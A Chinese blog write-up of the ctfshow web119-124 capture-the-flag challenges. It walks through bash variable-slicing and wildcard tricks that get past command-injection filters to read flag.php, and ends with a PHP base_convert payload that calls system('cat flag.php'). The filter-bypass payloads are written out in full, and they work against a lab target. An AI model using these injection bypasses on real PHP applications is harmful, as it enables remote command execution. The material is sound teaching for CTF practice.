ctfshow web入门web119-124

最新推荐文章于 2024-04-07 18:00:07 发布
最新推荐文章于 2024-04-07 18:00:07 发布
阅读量539 收藏
点赞数
分类专栏: ctfshow通关 文章标签: php bash 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/130137330
版权

1.web119

和118题类似,只不过是过滤了PATH

0可以用任何字符代替,比如 A , {A}, A,{0}
KaTeX parse error: Expected '}', got '#' at position 2: {#̲SHLVL}=1,或者{##},${#?}
{PHP_VERSION:~A}=2,php版本为x.x.2时
${#IFS}=3(linux下是3,mac里是4)
${#HOME}为5
${#RANDOM}一般是5,也可能是4

SHLVL 是记录多个 Bash 进程实例嵌套深度的累加器,而 BASH_SUBSHELL 是记录一个 Bash 进程实例中多个子 Shell(subshell)嵌套深度的累加器
在这里插入图片描述

pwd:/tmp
echo ${PWD:0:1} #表示从0下标开始的第一个字符(从右往左开始取)
echo ${PWD:~0:1} #从结尾开始往前的第一个字符(从右往左开始取)
echo ${PWD:~0:2} #也只是取一个字符,因为是从右往左开始取的
echo ${PWD:~3:3} <=>echo ${PWD:0:3}
echo ${PWD:~0}
echo ${PWD:~A} #所以字母和0具有同样作用

在这里插入图片描述pwd:/var/www/html
user:www-data
home:/www-data
在这里插入图片描述
payload:

${#HOSTNAME}=7,${HOSTNAME}=ctfshow
${HOME:${#HOSTNAME}:${#SHLVL}}     =>   t
${PWD:${Z}:${#SHLVL}}   或${PWD:${#}:${#SHLVL}} =>   /   
/bin/cat flag.php
构造的是/???/??t ????.???  =>/bin/cat flag.php
${PWD:${#}:${#SHLVL}}???${PWD:${#}:${#SHLVL}}??${HOME:${#HOSTNAME}:${#SHLVL}} ????.???
还可构造/???/?at ????.??? =>/bin/cat flag.php
${PWD:${#}:${#SHLVL}}???${PWD:${#}:${#SHLVL}}?${USER:~${PHP_VERSION:~A}:${PHP_VERSION:~A}} ????.???
还可构造/???/?a? ????.???
${PWD::${#SHLVL}}???${PWD::${#SHLVL}}?${USER:~A}? ????.???

2.web120

在这里插入图片描述
这题把home过滤掉了,还限制了长度

payload:

${PWD::${#SHLVL}}???${PWD::${#SHLVL}}?${USER:~A}? ????.???
右键查看源代码即可得到flag

在这里插入图片描述

3.web121

在这里插入图片描述
又过滤了~,SHLVL,还是限制了长度
在用/???/?a? ???.???发现构造不出来
/bin/rev即rev将文件内容读取并进行反转,就倒着输出文件内容
paylaod:

${#?}或${##}=1
${IFS}=3
/???/r?? ????.???
${PWD::${#?}}???${PWD::${#?}}${PWD:${#IFS}:${#?}}?? ????.???
linux执行下条命令,反转为原来的
echo 'php?< ;"}be80abe44d20-c48b-e194-7c20-38ad93c1{wohsftc"=galf$ >?'|rev

4.web122

在这里插入图片描述
又把#过滤了
通过 ? 来实现的, ?来实现的, ?来实现的,?是表示上一条命令执行结束后的传回值。通常0代表执行成功,非0代表执行有误,执行错误时可能为1,${RANDOM::1}可能为4,也可能为其他值
在这里插入图片描述

为了能够让$?可以输出1,那么就需要让前一条命令是错误的,这个错误命令的返回值是1,可以用<A
在这里插入图片描述
payload:

/???/?????4 ????.???=>/bin/base64
<A;${HOME::$?}???${HOME::$?}?????${RANDOM::$?} ????.???
#多试几次才会使random出现4这个数字

5.web124

在这里插入图片描述
过滤了一些符号,并且使用的字母必须是数学函数的白名单里的字母,控制了长度不能大于80,可以通过$_GET[]传参来绕过过滤,[]可以用{}代替
base_convert #在任意进制之间转换数字。
hexdec #把十六进制转换为十进制。
dechex #把十进制转换为十六进制。
hex2bin #把十六进制的字符串转换为ASCII码
没有hex2bin需要使用base_convert构造出来

<?php

echo base_convert('hex2bin',36,10);
echo '</br>';
//把_GET转为16进制,在转为10进制
//直接16进制不行,因为会有字母
echo hexdec(bin2hex('_GET'));
echo '</br>';
//下方是使用base_concvert对_GET转为10进制
//但是输出后发现是get,而不是_GET
//echo base_convert(21269,10,36);
echo '</br>';
//把hex2bin的十进制进行输出查看是不是一致
echo base_convert(37907361743,10,36)
?>
10进制数表示
_GET:37907361743
hex2bin :1598506324
hex2bin(dechex(37907361743))>base_convert(1598506324,10,36)(dechex(37907361743))
$$pi{abs}($$pi{acos})&abs=>$_GET['abs']($_GET['aos'])

payload:

$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{abs}($$pi{acos})&abs=system&acos=cat flag.php

参考文章:
SHLVL
ctfshow命令执行web118-124
ctfshow 命令执行web118-124
web124

mushangqiujin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ctfshow]web入门——命令执行(web118-web122+web124
ShenZ的博客
02-28 3524
[ctfshow]web入门——命令执行 文章目录[ctfshow]web入门——命令执行web118web119web120web121web122web124 web118 源码里有提示 非法输入会有evil input fuzz一下发现可以用大写字母A-Z和${}~.?: # echo ${PWD} /root # echo ${PWD:0:1} #表示从0下标开始的第一个字符 / # echo ${PWD:~0:1} #从结尾开始往前的第一个字符
CTFshow 命令执行 web119
Kradress的博客
12-06 298
目录源码思路题解总结 源码 输入源码 思路 检查过滤 import requests import string url = "http://ceee6bb5-ecd8-4ff1-923e-30e6d10767ec.challenge.ctf.show/" list = string.ascii_letters+string.digits+"$+-#}{_><:?*.~/\\ " white_list = "" for payload in list: data = {
ctfshow web入门 web118--web122 && web124
最新发布
2301_81040377的博客
04-07 257
数字4还是用RANDOM随机数来获取,不过是换种方式,1/10的概率,多发几次包。获取上一条命令执行结束后的返回值就是1。我们就成功构造出了数字1。这里利用一个环境变量切片得到所能使用的字母执行命令。等命令会因找不到目录或者文件执行失败,返回值是1,但是空格没被过滤我把${IFS}换成空格就刚好了。用hackbar给我卡着了那就抓包呗。我本来想套娃,但是长度被限制了。借用大佬的好东西我还没懂。
ctfshow学习记录-web入门(命令执行119-122&124
龟速更新的九某人
06-29 785
ctfshow学习记录-web入门(命令执行web119-122&124
CTFshow_web入门_命令执行(web29-web77、web118-web122、web124)
monster663的博客
02-02 1148
CTFshow web入门系列持续更新 web入门_命令执行 web29 上源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:26:48 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ er
CTFshow 命令执行 web120
Kradress的博客
12-06 320
目录源码思路题解总结 源码 <?php error_reporting(0); highlight_file(__FILE__); if(isset($_POST['code'])){ $code=$_POST['code']; if(!preg_match('/\x09|\x0a|[a-z]|[0-9]|PATH|BASH|HOME|\/|\(|\)|\[|\]|\\\\|\+|\-|\!|\=|\^|\*|\x26|\%|\<|\>|\'|\"|\`|\||\,/'
ctfshow-web入门-爆破web25
HkD01L的博客
06-20 764
mt_srand()是伪随机,通过分发种子,如果有种子的话,生成随机数的值也是固定的,生成的值也和php的版本有关,ctfshow,web25,爆破
ctfshow web入门 web57
lonmar的博客
11-24 1117
文章目录0x010x020x03 看wp分析一波 只要凑出36即可 0x01 shell中各种括号()、(())、[]、[[]]、{}的作用和区别 : https://blog.csdn.net/qq_46091464/article/details/108563368 ${_}:代表上一次命令执行的结果 $(()): 做运算 0x02 之前没有命令返回或者执行,结果应该是空,与""等价 又 $((""))值为0,$((~$((""))))值为-1,再做拼接: 所以可以拼接得到-37 , -37
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
Jay17的博客
08-16 2978
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
CTFshow web入门 web71~web77 web118~web122 web124 命令执行
qq_56815564的博客
04-21 688
在RANDOM中产生的随机数可以是1、2、3、4、5这个5个数,但1,2,3这三个出现的概率很低,所以基本上是4或5,因此如果要使用RANDOM的话其实也有碰运气的成分在里面,没准就撞到了正确的数。回到构造 4 这个字符上,再Linux中,${#xxx}显示的是这个数值的位数,而如果不加 # 的话就是显示这个数原本的值,比如12345再加上#后就是5。像 /bin/cat flag.php 之类的也是可以的,这个只需要构造一个 t 和 / 就行了,构造出来的长度也短一些。
ctf.show命令执行(web29-web124)
wanan的博客
08-31 3297
ctf.show命令执行(web29-web124)
Process.waitFor()的返回值含义
立交桥的博客
08-20 719
以下是Linux中返回值对照表 "OS error code 1: Operation not permitted" "OS error code 2: No such file or directory" "OS error code 3: No such process" "OS error code 4: Interrupted system call" "OS error code 5: Input/output error" "OS error code 6:...
ctfshow web入门 命令执行 web29~web77 web118~web124
qq_62989306的博客
09-13 2031
eval函数实现RCE、文件包含通过data协议实现RCE、eval函数无数字字母实现RCE、system函数绕过>/dev/null 2>&1实现RCE、system函数各种骚操作实现RCE。无参数RCE、无数字字母RCE、绕过open_basedir、PDO连接数据库load_fiel读取文件、利用FFI调用C库的system函数、环境变量……
ctfshow 命令执行 web 29~124
shinygod的博客
02-22 422
原理:因为localeconv()的第个元素是“.”,然后pos()能够提取出当前元素的值,也就是“.”,而scandir()能过返回指定目录中的文件和目录的数组,然而上一层pos()已经提取出".“,这样就变成scandir(”.")返回当前目录下的目录数组,array_reverse()以相反的元素顺序返回数组,next()提取第二个元素,最后用read_file()、highlight_file()和show_source()读出源码。//若成功,则返回一个数组,若失败,则返回 false。
ctfshow web入门 web11
12-12
根据提供的引用内容,我们可以得知ctfshow web入门系列共有20道题目,其中web11是其中的一道题目。由于没有提供具体的题目描述,我无法给出具体的解答。但是,我可以为您提供一些解决CTF Web题目的一般性建议: 1....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值